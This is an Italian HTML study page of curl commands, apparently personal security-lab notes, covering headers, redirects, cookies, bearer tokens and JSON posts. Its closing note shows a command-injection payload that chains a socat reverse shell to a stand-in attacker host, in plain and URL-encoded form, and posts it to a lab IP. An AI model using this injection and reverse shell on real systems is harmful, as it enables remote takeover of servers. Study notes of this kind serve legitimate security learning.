<!DOCTYPE HTML>
<html lang="it">
<head>
<meta charset="UTF-8">
<title>Linux CMD "Extra"</title>
<meta name="description" content="Extra">
    <meta name="author" content="Massimo">
    <link rel="stylesheet" href="../Styles/Styles.css">
</head>
<body>

<!-- Dashboard iframe -->
<div class="dashboard">
    <iframe src="../dashboardSOC.html" title="dashboardSOC"></iframe>
</div>
<!-- Wireframe iframe -->
<div class="dashboard">
    <iframe src="../LinuxCMD.html" title="linuxCMD"></iframe>
</div>

<!-- Header titolo -->
<header>
    <div class="line"></div>
    <h3>Extra Linux CMD</h3>
</header>
<div class="flex-container">
    
        <div id="inizio" class="tools-container">
        <a href="#curl"  class="button-link">curl - browser testuale internet</a>    

        </div>
      
<div class="sub-container">
    <h2 id="curl">Curl</h2>      
<ul>
    <li><code>curl http://10.82.128.63:8000  </code> - visualizza la pagina html</li>
    <li><code>curl https://example.com -o pagina.html</code> - salvare una pagina su file</li>
    <li><code>curl -I https://example.com</code> - vedere solo gli headers, utile per status code (200, 404, 301…), tipo di server, redirect</li>
    <li><code>curl -L https://example.com</code> - seguire i redirects</li>
    <li><code>curl -A "Mozilla/5.0" https://example.com</code> - simulare un browser (alcuni siti bloccano le richieste no browser)</li>
    <li><code>curl "https://example.com/search?q=linux&page=1"</code> - richiesta get con parametri</li>
    <li><code>curl -X POST -d "user=admin&pass=1234" https://example.com/login </code> - Form classico </li>
    <li><code>curl -v https://example.com  </code> - vedere richiesta + debug</li>
</ul>
<h3>COOKIE</h3>
<p>Perché salvare i cookie: HTTP è stateless → il server non ricorda nulla di te tra una richiesta e la successiva.
Il server risponde e fine. Alla richiesta dopo, per il server sei uno nuovo.
Quindi i cookie sono l’unico modo standard per:<br>
- mantenere una sessione <br>  - restare loggati <br>- conservare preferenze <br>-superare controlli anti-bot semplici<br>
esempio cookie:</p>
<code>curl -c cookie.txt -X POST \
  -d "user=mario&pass=segretissima" \
  https://sito.com/login
</code><br>
<code>curl -b cookie.txt https://sito.com/dashboard</code><br>
<code>****<br>
curl -c cookie.txt https://example.com  --> salvare cookie<br>
curl -b cookie.txt https://example.com/dashboard     ---> riutilizzarli<br>
***</code><br>
<code>
curl -H "Authorization: Bearer TOKEN" https://example.com/api  --> aggiungere header personalizzati  (Serve a dimostrare al server chi sei quando accedi a una API protetta.)
</code><br>
<p>inviare dati post  JSON (API) ---> </p>
<code>
curl -X POST https://example.com/api \       
  -H "Content-Type: application/json" \
  -d '{"name":"Mario","age":18}'
</code>
<p><b>Nota bene:</b> bisogna ricordarsi che su target bisogna usare URL encoded, altrimenti non legge i simboli && = %26%26 , esempio <br>
    127.0.0.1 && socat TCP:attacker.thm:1337 EXEC:sh    ----> url encoded= 127%2E0%2E0%2E1%20%26%26%20socat%20TCP%3Aattacker%2Ethm%3A1337%20EXEC%3Ash<br>
    curl -X POST -d "target=127%2E0%2E0%2E1%26%26%20socat%20TCP%3Aattacker%2Ethm%3A1337%20EXEC%3Ash" http://10.82.128.63:8000<br>
</p>
<a href="#inizio"  class="button-link">Torna all'indice!</a>
<hr>
     
</div>

</body>
</html>
